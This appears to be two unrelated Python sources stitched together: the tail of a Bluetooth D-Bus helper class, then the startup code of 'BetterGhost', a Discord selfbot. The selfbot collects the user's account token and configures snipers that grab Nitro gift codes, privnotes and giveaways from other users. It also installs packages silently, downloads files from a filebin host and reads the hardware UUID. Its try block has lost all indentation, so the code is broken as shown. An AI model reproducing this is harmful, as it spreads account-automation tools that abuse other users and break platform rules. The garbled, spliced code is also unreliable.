            not_supported = ReadWriteNotifyError.NOT_SUPPORTED
            raise ReadWriteNotifyError(long_reason=not_supported)
        elif exp.error_name == IfaceError.BLUEZ_NOT_PERMITTED_ERR:
            self.stop_engine()
            not_permitted = ReadWriteNotifyError.NOT_PERMITTED
            raise ReadWriteNotifyError(long_reason=not_permitted)
        elif exp.error_name == IfaceError.BLUEZ_NOT_READY_ERR:
            self.stop_engine()
            raise ControllerNotReady
        elif exp.error_name == IfaceError.BLUEZ_NOT_AUTHORIZED_ERR:
            self.stop_engine()
            not_authorized = ReadWriteNotifyError.NOT_AUTHORIZED
            raise ReadWriteNotifyError(long_reason=not_authorized)
        elif exp.error_name == IfaceError.BLUEZ_INVALID_VAL_LEN:
            self.stop_engine()
            invalid_len = InvalidArgumentsError.INVALID_LEN
            raise InvalidArgumentsError(long_reason=invalid_len)
        elif exp.error_name == IfaceError.UNKNOWN_ERROR:
            # BUGFIX: this condition previously appeared twice; the second
            # branch (the only one that stopped the engine) was unreachable.
            # Merged into a single branch that stops the engine first.
            self.stop_engine()
            raise BluewError(BluewError.UNEXPECTED_ERROR)
        elif exp.error_name == IfaceError.BLUEZ_INVALID_ARGUMENTS_ERR:
            self.stop_engine()
            invalid_args = InvalidArgumentsError.INVALID_ARGS
            raise InvalidArgumentsError(long_reason=invalid_args)
        elif exp.error_name == IfaceError.BLUEZ_IN_PROGRESS_ERR:
            self.stop_engine()
            in_progress = ReadWriteNotifyError.IN_PROGRESS
            raise ReadWriteNotifyError(long_reason=in_progress)
        elif auth_failed or auth_timeout or auth_rejected:
            self.stop_engine()
            raise PairError(long_reason=PairError.AUTHENTICATION_ERROR)

    def _is_device_available(self, dev):
        """Scan until the device shows up or the timeout expires."""
        self._start_scan()
        devices = self._tout(self._get_devices,
                             self.timeout,
                             lambda devs: any(dev in d.Path for d in devs))
        devices = devices()
        filtered = list(filter(lambda device: dev in device.Path, devices))
        self._stop_scan()
        return bool(filtered)

    def _is_device_paired(self, dev):
        """Poll until the device reports Paired or the timeout expires."""
        def _dev_is_paired(devs):
            for _dev in devs:
                if dev in _dev.Path and _dev.Paired:
                    return True
            return False

        devices = self._tout(self._get_devices,
                             self.timeout,
                             _dev_is_paired)()
        filtered = list(filter(lambda device: dev in device.Path, devices))
        filtered = list(filter(lambda device: device.Paired, filtered))
        return bool(filtered)

    def _is_device_paired_timeout(self, dev):
        """Thin wrapper kept for the decorators' expected interface."""
        paired = self._is_device_paired(dev)
        return paired

    def _is_device_connected(self, dev):
        """Poll until the device is visible, then check its Connected flag."""
        devices = self._tout(self._get_devices,
                             self.timeout,
                             lambda devs: any(dev in d.Path for d in devs))
        devices = devices()
        filtered = list(filter(lambda device: dev in device.Path, devices))
        filtered = list(filter(lambda device: device.Connected, filtered))
        return bool(filtered)

    def _get_attr_path(self, uuid, dev):
        """Return the object path of the characteristic with this UUID,
        or '' if the device does not expose it (yet)."""
        chrcs = self.get_chrcs(dev)
        try:
            chrc = list(filter(lambda chrc_: uuid == chrc_.UUID, chrcs))[0]
            path = getattr(chrc, 'Path')  # just silencing pycharm.
        except IndexError:
            path = ''
        return path

    def _uuid_to_path(self, uuid, dev):
        """Resolve a characteristic UUID to its D-Bus object path, retrying
        until self.timeout; raise DeviceNotAvailable on failure."""
        path = self._timeout(self._get_attr_path, self.timeout)(uuid, dev)
        if not path:
            raise DeviceNotAvailable(self.name, self.version)
        return path

    @staticmethod
    def _handle_notification(func):
        """Wrap a user callback to extract the 'Value' bytes from the raw
        PropertiesChanged signal arguments."""
        def _wrapper(*args):
            try:
                data = bytes(args[1][dbus.String('Value')])
                return func(data)
            except KeyError:
                # Signal did not carry a Value update; ignore it.
                pass
        return _wrapper

    @staticmethod
    def _timeout(func, timeout):
        """Retry func until it returns a truthy value or timeout expires."""
        def _wrapper(*args, **kwargs):
            result = False
            start_time = time.time()
            current_time = time.time()
            while (current_time < start_time + timeout) and not result:
                result = func(*args, **kwargs)
                current_time = time.time()
            return result
        return _wrapper

    @staticmethod
    def _tout(func, timeout, case):
        """Retry func until case(result) is True or timeout expires; always
        returns the last result (even on timeout)."""
        def _wrapper(*args, **kwargs):
            is_case = False
            timedout = False
            ret = None
            start_time = time.time()
            while not timedout and not is_case:
                ret = func(*args, **kwargs)
                is_case = case(ret)
                timedout = time.time() > start_time + timeout
            return ret
        return _wrapper
|
BetterGhost.py | #!/usr/bin/python
# -*- coding: UTF-8 -*-
# Copyright (C) 2021 Ben Tettmar
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
from re import T
# Startup housekeeping: silence pygame, clear the console, print the banner,
# and (re)initialise the per-severity log files.
os.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = "hide"
printSpaces = " "
if os.name == "nt":
    os.system("cls")
    # os.system("mode 100,25")
    os.system("title BetterGhost")
if os.name == "posix":
    os.system("clear")
print(" ")
print(f"{printSpaces}Loading BetterGhost...")
print(" ")
import sys
import subprocess
import logging
if not os.path.exists('logs/'):
    os.makedirs('logs/')
    print(printSpaces+"Made logs folder.")
# Reset each log file; context managers close the handles immediately
# instead of leaking them until garbage collection.
for _log_name in ("info", "warning", "error", "critical"):
    with open(f"logs/{_log_name}.log", "w") as _log_file:
        _log_file.write(" ")
    print(printSpaces + f"Resetting {_log_name} log.")
print(" ")
# BUGFIX: logging.basicConfig() only configures the root logger on its
# FIRST call — the three subsequent calls in the original were silent
# no-ops, so only info.log ever received records. Attach one FileHandler
# per severity so every file actually gets its level (and above).
_root_logger = logging.getLogger()
_root_logger.setLevel(logging.INFO)
for _log_name, _level in (("info", logging.INFO),
                          ("warning", logging.WARNING),
                          ("error", logging.ERROR),
                          ("critical", logging.CRITICAL)):
    _handler = logging.FileHandler(f"logs/{_log_name}.log")
    _handler.setLevel(_level)
    _root_logger.addHandler(_handler)
try:
# pythonVersion = float(str(sys.version_info[0])+"."+str(sys.version_info[1]))
# if pythonVersion < 3.8:
# input("You're not using a supported Python version.")
# exit()
# else:
# print("You're using a supported python version, " + str(pythonVersion))
def install(package):
os.system(f"{sys.executable} -m pip install {package}")
def uninstall(package):
os.system(f"{sys.executable} -m pip uninstall {package}")
if "discord.py" in sys.modules:
uninstall("discord.py")
if "discordselfbot" in sys.modules:
uninstall("discordselfbot")
try:
import discord
except ModuleNotFoundError:
install("discord.py-self")
#try:
# import pyPrivnote as pn
#except ModuleNotFoundError:
# install("pyPrivnote")
try:
import names
except ModuleNotFoundError:
install("names")
try:
import simplejson
except ModuleNotFoundError:
install("simplejson")
try:
import aiohttp
except ModuleNotFoundError:
install("aiohttp")
try:
from colour import Color
except ModuleNotFoundError:
install("colour")
try:
from termcolor import colored
except ModuleNotFoundError:
install("termcolor")
try:
from faker import Faker
except ModuleNotFoundError:
install("Faker")
if os.name == "nt":
try:
import plyer
except ModuleNotFoundError:
install("plyer")
try:
from sty import fg, bg, ef, rs, Style, RgbFg
except ModuleNotFoundError:
install("sty==1.0.0rc0")
try:
import colorama
except ModuleNotFoundError:
install("colorama")
try:
import discord_rpc
except ModuleNotFoundError:
install("discord-rpc.py")
try:
import requests
except ModuleNotFoundError:
install("requests")
try:
import uwuify
except ModuleNotFoundError:
install("uwuify")
try:
import numpy as np
except ModuleNotFoundError:
install("numpy")
try:
import discum
except ModuleNotFoundError:
install("discum")
try:
from discord_webhook import DiscordWebhook, DiscordEmbed
except ModuleNotFoundError:
install("discord-webhook")
try:
from random_user_agent.user_agent import UserAgent
from random_user_agent.params import SoftwareName, OperatingSystem
except ModuleNotFoundError:
install("random_user_agent")
try:
import GPUtil
except ModuleNotFoundError:
install("gputil")
try:
import psutil
except ModuleNotFoundError:
install("psutil")
try:
import PIL
except ModuleNotFoundError:
install("pillow")
try:
import pygame
except ModuleNotFoundError:
install("pygame")
# if os.name == "posix":
# if str(subprocess.check_output(["apt-cache", "policy", "libportaudio2"])).split("\\n")[1][2:].split(": ")[1] == "(none)":
# os.system("sudo apt-get install libportaudio2")
try:
import sounddevice
except ModuleNotFoundError:
install("sounddevice")
try:
import discord_emoji
except ModuleNotFoundError:
install("discord-emoji")
if sys.platform == "darwin":
try:
import pync
except ModuleNotFoundError:
install("pync")
if os.name == "nt":
try:
import wmi
except ModuleNotFoundError:
install("WMI")
import wmi
if os.name == "nt":
import plyer
try:
import tkinter
except:
pass
if sys.platform == "darwin":
import pync
import colorama
import discord_emoji
import threading
import pygame
import PIL
from random_user_agent.user_agent import UserAgent
from random_user_agent.params import SoftwareName, OperatingSystem
from discord_webhook import DiscordWebhook, DiscordEmbed
import discum
if os.name == "nt":
import winshell
import uwuify
import getpass
import mimetypes
import discord_rpc
from sty import fg, bg, ef, rs, Style, RgbFg
import discord
import json
#import pyPrivnote as pn
import random
import asyncio
import requests
import aiohttp
import names
import string
import simplejson
import base64
import math
import time
import urllib
import urllib.request
import codecs
import platform
import psutil
import re
import ctypes
import ctypes.util
import GPUtil
from urllib.request import Request, urlopen
from colour import Color
from discord.ext import commands
from discord.utils import get
from termcolor import colored, cprint
from os.path import dirname, basename, isfile, join
from datetime import datetime, timedelta
import numpy as np
from faker import Faker
def update_config():
    """Migrate config.json in place.

    Adds settings introduced by newer releases (with their defaults),
    removes obsolete ones, and writes the file back with the same layout
    (insertion order kept, 4-space indent).

    Bug fixed: key presence used to be tested with a substring search over
    the raw file text (e.g. ``"tickets" not in configFile``), which
    mis-fires whenever a key name happens to appear inside an unrelated
    value such as a webhook URL.  All presence checks now operate on the
    parsed JSON.  The old add-then-immediately-remove dance for
    "load_on_startup" collapses to the removal alone.
    """
    with open("config.json") as fp:
        configJson = json.load(fp)
    if "riskmode" not in configJson:
        print(f"{printSpaces}Adding risk mode to config.")
        configJson["riskmode"] = False
    if "giveaway_join_delay" not in configJson:
        print(f"{printSpaces}Adding giveaway join delay to config.")
        configJson["giveaway_join_delay"] = 15
    if "giveaway_sniper_ui" not in configJson:
        print(printSpaces + "Adding giveaway sniper ui to config.")
        configJson["giveaway_sniper_ui"] = False
    if "snipers" not in configJson:
        configJson["snipers"] = {}
        print(printSpaces + "Adding nitro sniper to config.")
        configJson["snipers"]["nitro"] = True
        print(printSpaces + "Adding privnote sniper to config.")
        configJson["snipers"]["privnote"] = True
        print(printSpaces + "Adding giveaway sniper to config.")
        configJson["snipers"]["giveaway"] = True
    if "webhooks" not in configJson:
        configJson["webhooks"] = {}
        print(printSpaces + "Adding nitro webhook to config.")
        configJson["webhooks"]["nitro"] = ""
        print(printSpaces + "Adding privnote webhook to config.")
        configJson["webhooks"]["privnote"] = ""
        print(printSpaces + "Adding giveaway webhook to config.")
        configJson["webhooks"]["giveaway"] = ""
    if "motd" not in configJson:
        configJson["motd"] = {}
        configJson["motd"]["custom"] = False
        print(printSpaces + "Adding custom motd option to config.")
        configJson["motd"]["custom_text"] = "Super Cool Custom MOTD"
        print(printSpaces + "Adding custom motd text to config.")
    # Obsolete top-level toggles superseded by the "detections" table.
    if "selfbot_detect" in configJson:
        configJson.pop("selfbot_detect")
        print(printSpaces + "Removing selfbot detect from config.")
    if "ghostping_detect" in configJson:
        configJson.pop("ghostping_detect")
        print(printSpaces + "Removing ghostping detect from config.")
    # Webhooks added one release at a time; key name and printed label differ.
    webhook_additions = (
        ("ghostping", "ghostping"),
        ("friendsupdate", "friends update"),
        ("dmtyping", "DM typing"),
        ("guildleave", "guild leave"),
        ("selfbot", "selfbot"),
        ("tickets", "tickets"),
    )
    for key, label in webhook_additions:
        if key not in configJson["webhooks"]:
            configJson["webhooks"][key] = ""
            print(printSpaces + "Adding " + label + " webhook to config.")
    if "sounds" not in configJson:
        configJson["sounds"] = True
        print(printSpaces + "Adding sounds toggle to config.")
    if "detections" not in configJson:
        configJson["detections"] = {}
        configJson["detections"]["selfbot"] = True
        print(printSpaces + "Adding selfbot detection to config.")
        configJson["detections"]["ghostping"] = True
        print(printSpaces + "Adding ghostping detection to config.")
        configJson["detections"]["bans"] = True
        print(printSpaces + "Adding ban detection to config.")
    # Later detection toggles: (key, default, printed label).
    detection_additions = (
        ("deletedmessages", False, "deleted messages"),
        ("webhookmodification", True, "webhook modification"),
        ("friendsupdate", True, "friends update"),
        ("dmtyping", True, "DM typing"),
        ("guildleave", True, "guild leave"),
    )
    for key, default, label in detection_additions:
        if key not in configJson["detections"]:
            configJson["detections"][key] = default
            print(printSpaces + "Adding " + label + " detection to config.")
    if "embed_mode" not in configJson:
        configJson["embed_mode"] = False
        print(printSpaces + "Adding embed mode to config.")
    if "ignored_servers" not in configJson:
        configJson["ignored_servers"] = {}
        for key in ("nitro", "privnote", "giveaways", "ghostpings",
                    "selfbots", "bans", "deletedmessages"):
            configJson["ignored_servers"][key] = []
            print(printSpaces + "Adding " + key + " ignored servers to config.")
    if "webhookmodifications" not in configJson["ignored_servers"]:
        configJson["ignored_servers"]["webhookmodifications"] = []
        print(printSpaces + "Adding webhook modification ignored servers to config.")
    if "tickets" not in configJson["snipers"]:
        configJson["snipers"]["tickets"] = True
        print(printSpaces + "Adding ticket sniper to config.")
    if "tickets" not in configJson["ignored_servers"]:
        configJson["ignored_servers"]["tickets"] = []
        print(printSpaces + "Adding tickets ignored servers to config.")
    if "guildleave" not in configJson["ignored_servers"]:
        configJson["ignored_servers"]["guildleave"] = []
        print(printSpaces + "Adding guild leave ignored servers to config.")
    if "api_keys" not in configJson:
        print(printSpaces + "Adding api keys to config.")
        configJson["api_keys"] = {}
        configJson["api_keys"]["tenor"] = ""
    if "alexflipnote" not in configJson["api_keys"]:
        print(printSpaces + "Adding alexflipnote to api keys.")
        configJson["api_keys"]["alexflipnote"] = ""
    if "afkmode" not in configJson:
        print(printSpaces + "Adding afkmode to config.")
        configJson["afkmode"] = {
            "enabled": False,
            "replymessage": "[AUTOMATED] i'm currently afk i will respond as soon as possible",
        }
    if "toastnotifications" not in configJson:
        print(printSpaces + "Adding toast notifications to config.")
        configJson["toastnotifications"] = True
    # Dropped feature: previous builds added this key only to remove it again.
    if "load_on_startup" in configJson:
        configJson.pop("load_on_startup")
        print(printSpaces + "Removing load on startup from config.")
    with open("config.json", "w") as fp:
        json.dump(configJson, fp, sort_keys=False, indent=4)
# Workspace layout: every directory the selfbot writes into must exist.
for _folder in ('pytoexe/', 'privnote-saves/', 'scripts/', 'data/',
                'themes/', 'sounds/'):
    if not os.path.exists(_folder):
        os.makedirs(_folder)
# First-run asset fetch: window icon and UI sound effects are downloaded
# once and then reused from disk.  (A previous ghost.cool mirror for these
# assets was retired; its URLs were left commented out upstream.)
_assets = {
    'icon.ico': 'https://raw.githubusercontent.com/tenieTheFlower/icon/main/icon.ico',
    'sounds/connected.mp3': 'https://filebin.net/x1ug44p9jgk0na3r/connected.mp3',
    'sounds/error.mp3': 'https://filebin.net/x1ug44p9jgk0na3r/error.mp3',
    'sounds/notification.mp3': 'https://filebin.net/x1ug44p9jgk0na3r/notification.mp3',
    'sounds/success.mp3': 'https://filebin.net/x1ug44p9jgk0na3r/success.mp3',
    'sounds/giveaway-win.mp3': 'https://filebin.net/x1ug44p9jgk0na3r/giveaway-win.mp3',
}
for _path, _url in _assets.items():
    if not os.path.isfile(_path):
        open(_path, 'wb').write(requests.get(_url, allow_redirects=True).content)
# First-run bootstrap: write skeleton data files so later json.load calls
# never hit a missing file.  Each is created only if absent.
# Minimal config; update_config() backfills every newer setting afterwards.
if not os.path.isfile('config.json'):
    f = open('config.json', "w")
    f.write("""
{
"token": "",
"prefix": ".",
"delete_timeout": 15,
"theme": "BetterGhost"
}
""")
    f.close()
# Known giveaway-bot IDs mapped to the reaction emoji used to enter.
# codecs.open with explicit UTF-8 so the emoji survive on platforms whose
# default encoding is not UTF-8.
if not os.path.isfile('giveawaybots.json'):
    f = codecs.open('giveawaybots.json', "w", encoding="UTF-8")
    f.write("""
{
"294882584201003009": "🎉",
"396464677032427530": "🎉",
"720351927581278219": "🎉",
"582537632991543307": "🎉"
}
""")
    f.close()
# Example user-defined text commands (command name -> reply text).
if not os.path.isfile('customcommands.json'):
    f = open('customcommands.json', "w")
    f.write("""
{
"cmd1": "this is cmd1",
"cmd2": "this is cmd2"
}
""")
    f.close()
# Default Discord Rich Presence settings; migrated in place further below.
if not os.path.isfile('richpresence.json'):
    f = open('richpresence.json', 'w')
    f.write("""
{
"enabled": true,
"client_id": 914646995728220231,
"details": "Using BetterGhost selfbot...",
"state": "BetterGhost User",
"large_image_key": "icon",
"large_image_text": "http://www.betterghost.cf/"
}
""")
    f.close()
# Migrate an existing richpresence.json to the current schema and rewrite it.
if os.path.isfile("richpresence.json"):
    rpc = json.load(open("richpresence.json"))
    # Old default detail text is shortened to the current wording.
    if rpc["details"] == "Using BetterGhost selfbot...":
        rpc["details"] = "Using BetterGhost..."
    # Keys introduced later are backfilled with their defaults.  (A former
    # client_id check here reassigned the same value and was dropped as a
    # no-op.)
    rpc.setdefault("small_image_key", "small")
    rpc.setdefault("small_image_text", "http://www.betterghost.cf/")
    json.dump(rpc, open("richpresence.json", "w"), sort_keys=False, indent=4)
# Default theme shipped with the client; loaded further below via CONFIG["theme"].
if not os.path.isfile('themes/BetterGhost.json'):
    f = open('themes/BetterGhost.json', "w")
    f.write("""
{
"embedtitle": "BetterGhost",
"embedcolour": "#3B79FF",
"consolecolour": "#3B79FF",
"embedfooter": "http://www.betterghost.cf/",
"embedfooterimage": "https://ghost.cool/assets/icon.gif",
"globalemoji": ":blue_heart:",
"embedimage": "https://ghost.cool/assets/icon.gif"
}
""")
    f.close()
# Empty store for the user's saved ("pinned") notes.
if not os.path.isfile('data/personal-pins.json'):
    f = open('data/personal-pins.json', "w")
    f.write("{}")
    f.close()
# Empty token list (one token per line, appended elsewhere).
if not os.path.isfile('data/tokens.txt'):
    f = open('data/tokens.txt', "w")
    f.close()
# Lyrics payload used by a rickroll command; written verbatim on first run.
if not os.path.isfile('data/rickroll.txt'):
    f = open('data/rickroll.txt', "w")
    f.write("""We're no strangers to love
You know the rules and so do I
A full commitment's what I'm thinking of
You wouldn't get this from any other guy
I just wanna tell you how I'm feeling
Gotta make you understand
Never gonna give you up
Never gonna let you down
Never gonna run around and desert you
Never gonna make you cry
Never gonna say goodbye
Never gonna tell a lie and hurt you
We've known each other for so long
Your heart's been aching but you're too shy to say it
Inside we both know what's been going on
We know the game and we're gonna play it
And if you ask me how I'm feeling
Don't tell me you're too blind to see
Never gonna give you up
Never gonna let you down
Never gonna run around and desert you
Never gonna make you cry
Never gonna say goodbye
Never gonna tell a lie and hurt you
Never gonna give you up
Never gonna let you down
Never gonna run around and desert you
Never gonna make you cry
Never gonna say goodbye
Never gonna tell a lie and hurt you
Never gonna give, never gonna give
(Give you up)
(Ooh) Never gonna give, never gonna give
(Give you up)
We've known each other for so long
Your heart's been aching but you're too shy to say it
Inside we both know what's been going on
We know the game and we're gonna play it
I just wanna tell you how I'm feeling
Gotta make you understand
Never gonna give you up
Never gonna let you down
Never gonna run around and desert you
Never gonna make you cry
Never gonna say goodbye
Never gonna tell a lie and hurt you
Never gonna give you up
Never gonna let you down
Never gonna run around and desert you
Never gonna make you cry
Never gonna say goodbye
Never gonna tell a lie and hurt you
Never gonna give you up
Never gonna let you down
Never gonna run around and desert you
Never gonna make you cry
Never gonna say goodbye
Never gonna tell a lie and hurt...""")
    f.close()
# Example script demonstrating console-runnable commands: an alias of the
# form consoleCommand-<name> marks a command as invokable from the console.
if not os.path.isfile("scripts/consolecommand-example.py"):
    f = open("scripts/consolecommand-example.py", "w")
    f.write("""
@BetterGhost.command(name="consolecommand", description="console command test", usage="consoletest", aliases=["consoleCommand-consoletest"])
async def consoletest(ctx):
print("This is a command that can be executed in the console.")
print("You can create this commands by adding consoleCommand-{commandname} in the commands aliases.")
print("")
print("Any command that has that in the aliases will be able to be executed in the console and in discord so prints will be better.")
print("FYI: Arguments currently are not possible.")
""")
    f.close()
# Example script demonstrating the theme variables (__embed...__) that are
# injected into user scripts at load time.
if not os.path.isfile('scripts/example.py'):
    f = open('scripts/example.py', "w")
    f.write('''
@BetterGhost.command(name="example", description="Example custom script.", usage="example")
async def example(BetterGhost):
exampleEmbed = discord.Embed(
title="Example Embed",
description="""
An example embed to display what you can do in scripts.
Check `scripts/example.py` to see the code!
** **
BetterGhost scripts are all created in python using discord.py so you can use any feature from discord.py.
""",
color=__embedcolour__
)
exampleEmbed.add_field(name="Variables", value="""
**\_\_embedtitle\_\_** : Theme's embed title.
**\_\_embedcolour\_\_** : Theme's embed colour.
**\_\_embedfooter\_\_** : Theme's embed footer.
**\_\_embedimage\_\_** : Theme's embed image url.
**\_\_embedfooterimage\_\_** : Theme's embed footer image url.
**\_\_embedemoji\_\_** : Theme's global emoji.
**\_\_deletetimeout\_\_** : Config delete timeout (seconds).
""")
exampleEmbed.set_thumbnail(url=__embedimage__)
exampleEmbed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
await BetterGhost.send("Hello World!", embed=exampleEmbed)
''')
    f.close()
# Interactive first-run prompt: ask for the Discord token only while the
# config still has an empty one, then persist it.
if json.load(open("config.json"))["token"] == "":
    # Fire both clear commands; the one foreign to the host OS fails silently.
    os.system("cls")
    os.system("clear")
    print("")
    print("Please input your Discord token below.".center(os.get_terminal_size().columns))
    print("")
    config = json.load(open("config.json"))
    config["token"] = input()
    json.dump(config, open('config.json', 'w'), sort_keys=False, indent=4)
# Custom command table; the handle stays open for the process lifetime.
ccmd_file = open('customcommands.json')
ccmd = json.load(ccmd_file)
def updateTheme(theme):
    """Backfill newer theme keys in themes/<theme> and rewrite the file.

    Missing keys get the defaults introduced with them; existing values
    are never touched.
    """
    path = f"themes/{theme}"
    with open(path) as fp:
        data = json.load(fp)
    data.setdefault("consolecolour", "#3B79FF")
    data.setdefault("consolemode", "new")
    data.setdefault("embedlargeimage", "")
    with open(path, "w") as fp:
        json.dump(data, fp, sort_keys=False, indent=4)
# Bring every theme file up to the current schema before one is loaded.
for theme in os.listdir("themes"):
    if theme.endswith(".json"):
        updateTheme(theme)
# Migrate config.json itself, then snapshot everything into module globals.
update_config()
CONFIG = json.load(open("config.json"))
GIVEAWAYBOTS = json.load(codecs.open("giveawaybots.json", encoding="UTF-8"))
# Core settings.
__token__ = CONFIG["token"]
__prefix__ = CONFIG["prefix"]
# __loadonstartup__ = CONFIG["load_on_startup"]
__deletetimeout__ = CONFIG["delete_timeout"]
__theme__ = CONFIG["theme"]
__sounds__ = CONFIG["sounds"]
__riskmode__ = CONFIG["riskmode"]
# Sniper feature toggles.
__nitrosniper__ = CONFIG["snipers"]["nitro"]
__privnotesniper__ = CONFIG["snipers"]["privnote"]
__giveawaysniper__ = CONFIG["snipers"]["giveaway"]
__giveawaysniperui__ = CONFIG["giveaway_sniper_ui"]
__ticketsniper__ = CONFIG["snipers"]["tickets"]
# Webhook URLs for each notification channel ("" when unset).
__nitrowebhook__ = CONFIG["webhooks"]["nitro"]
__privnotewebhook__ = CONFIG["webhooks"]["privnote"]
__giveawaywebhook__ = CONFIG["webhooks"]["giveaway"]
__ghostpingwebhook__ = CONFIG["webhooks"]["ghostping"]
__friendsupdatewebhook__ = CONFIG["webhooks"]["friendsupdate"]
__dmtypingwebhook__ = CONFIG["webhooks"]["dmtyping"]
__guildleavewebhook__ = CONFIG["webhooks"]["guildleave"]
__selfbotwebhook__ = CONFIG["webhooks"]["selfbot"]
__ticketswebhook__ = CONFIG["webhooks"]["tickets"]
__giveawayjoindelay__ = CONFIG["giveaway_join_delay"]
# MOTD customisation.
__custommotd__ = CONFIG["motd"]["custom"]
__custommotdtext__ = CONFIG["motd"]["custom_text"]
# Detection feature toggles.
__selfbotdetect__ = CONFIG["detections"]["selfbot"]
__ghostpingdetect__ = CONFIG["detections"]["ghostping"]
__bandetect__ = CONFIG["detections"]["bans"]
__deletedmessagesdetect__ = CONFIG["detections"]["deletedmessages"]
__webhookmodificationdetect__ = CONFIG["detections"]["webhookmodification"]
__friendsupdatedetect__ = CONFIG["detections"]["friendsupdate"]
__dmtypingdetect__ = CONFIG["detections"]["dmtyping"]
__guildleavedetect__ = CONFIG["detections"]["guildleave"]
# Active theme values (embed appearance and console colour).
THEME = json.load(open(f"themes/{__theme__}.json"))
__embedtitle__ = THEME["embedtitle"]
# "#RRGGBB" -> int via the 0x prefix form accepted by int(..., 0).
__embedcolour__ = int(THEME["embedcolour"].replace('#', '0x'), 0)
__embedcolourraw__ = THEME["embedcolour"]
__embedfooter__ = THEME["embedfooter"]
__embedemoji__ = THEME["globalemoji"]
__embedimage__ = THEME["embedimage"]
__embedlargeimage__ = THEME["embedlargeimage"]
__embedfooterimage__ = THEME["embedfooterimage"]
__embedmode__ = CONFIG["embed_mode"]
__consolemode__ = THEME["consolemode"]
__ignoredservers__ = CONFIG["ignored_servers"]
__consolecolour__ = THEME["consolecolour"]
# Flipped to True once startup completes (set elsewhere).
__ghostloaded__ = False
__guildleaveignoredservers__ = CONFIG["ignored_servers"]["guildleave"]
# Subreddit names accepted by get_nsfw().
nsfwTypes = ["boobs", "ass", "hentai", "porngif", "pussy", "tits", "tittydrop", "tittypop", "titty", "femboy"]
now = datetime.now()
fake = Faker()
def getCurrentTime():
    """Current wall-clock time formatted as "HH:MM:SS"."""
    return f"{datetime.now():%H:%M:%S}"

def _console_line(tag_colour, tag, body):
    """Compose one tagged console line in the shared log format."""
    return f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {tag_colour}[{tag}] {fg.cWhite}{body}"

def print_important(message):
    """Console line with the purple [IMPORTANT] tag."""
    print(_console_line(fg.cPurple, "IMPORTANT", message))

def print_info(message):
    """Console line with the yellow [INFORMATION] tag."""
    print(_console_line(fg.cYellow, "INFORMATION", message))

def print_cmd(command):
    """Console line logging a locally executed command."""
    print(_console_line(fg.consoleColour, "COMMAND", command))

def print_sharecmd(author, command):
    """Console line logging a command run on someone else's behalf."""
    print(_console_line(fg.consoleColour, "SHARE COMMAND", f"({author}) {command}"))

def print_error(error):
    """Console line with the red [ERROR] tag."""
    print(_console_line(fg.cRed, "ERROR", error))

def print_detect(message):
    """Console line with the pink [DETECT] tag."""
    print(_console_line(fg.cPink, "DETECT", message))

def print_sniper(message):
    """Console line with the orange [SNIPER] tag."""
    print(_console_line(fg.cOrange, "SNIPER", message))

def print_sniper_info(firstmessage, secondmessage):
    """Key/value detail line printed under a sniper headline."""
    # An alignment loop padding to the timestamp width was disabled
    # upstream, so the pad is currently empty.
    pad = ""
    print(f"{printSpaces}{pad} {fg.cYellow}{firstmessage}: {fg.cGrey}{secondmessage}")
def is_me(m):
    """Message predicate: was *m* authored by the logged-in account?"""
    return BetterGhost.user == m.author
def restart_bot():
    """Replace this process with a fresh interpreter running the same argv."""
    interpreter = sys.executable
    os.execl(interpreter, interpreter, *sys.argv)
def close_bot():
    """Terminate the packaged executable via taskkill (only effective on Windows)."""
    kill_cmd = "taskkill /IM BetterGhost.exe"
    os.system(kill_cmd)
def is_windows():
    """True when running under Windows (os.name reports "nt")."""
    return os.name == "nt"

def is_linux():
    """True on POSIX systems; note macOS also reports "posix" here."""
    return os.name == "posix"
def GetUUID():
    """Return the machine hardware UUID string.

    Windows queries wmic; POSIX shells out to dmidecode (which usually
    needs root, and does not exist on macOS even though macOS also reports
    os.name == "posix" — NOTE(review): confirm the macOS call path).

    Bug fixed: on platforms matching neither branch, ``uuid`` was
    referenced uninitialised and raised UnboundLocalError; those now
    return "".
    """
    if is_windows():
        # wmic prints a header line, then the UUID; slice the bytes-repr
        # between the first "\n" escape and the trailing whitespace noise.
        out = str(subprocess.check_output('wmic csproduct get uuid'))
        start = out.find("\\n") + 2
        return out[start:-15]
    if is_linux():
        proc = subprocess.Popen(["dmidecode", "-s", "system-uuid"], stdout=subprocess.PIPE)
        return str(proc.communicate()[0]).replace("b'", "").replace("\\n'", "")
    return ""
def hex_to_rgb(hex_string):
    """Convert a "#RRGGBB" colour string to an (r, g, b) tuple of ints.

    Adapted from https://stackoverflow.com/a/64676639.
    """
    red, green, blue = (int(hex_string[pos:pos + 2], 16) for pos in (1, 3, 5))
    return red, green, blue
def get_nsfw(type):
    """Fetch a random NSFW media URL for one of the supported subreddits.

    Returns the string "Invalid type." when *type* is not in nsfwTypes.

    Cleanup: the original duplicated get_nsfw_custom_type's fetch logic
    inside a redundant ``for type2 in types`` scan whose only possible
    match was *type* itself; it now validates and delegates.
    """
    if type not in nsfwTypes:
        return "Invalid type."
    return get_nsfw_custom_type(type)
def get_nsfw_custom_type(type):
    """Pull a random post from reddit.com/r/<type> and return its media URL."""
    payload = requests.get(
        f"https://www.reddit.com/r/{type}/random.json",
        headers={'User-agent': get_random_user_agent()},
    ).json()
    post = payload[0]["data"]["children"][0]["data"]
    url = post["url"]
    if "redgifs" in str(url):
        # redgifs pages don't embed directly; fall back to reddit's cached
        # video preview.
        url = post["preview"]["reddit_video_preview"]["fallback_url"]
    return url
def send_notification(title, message, duration):
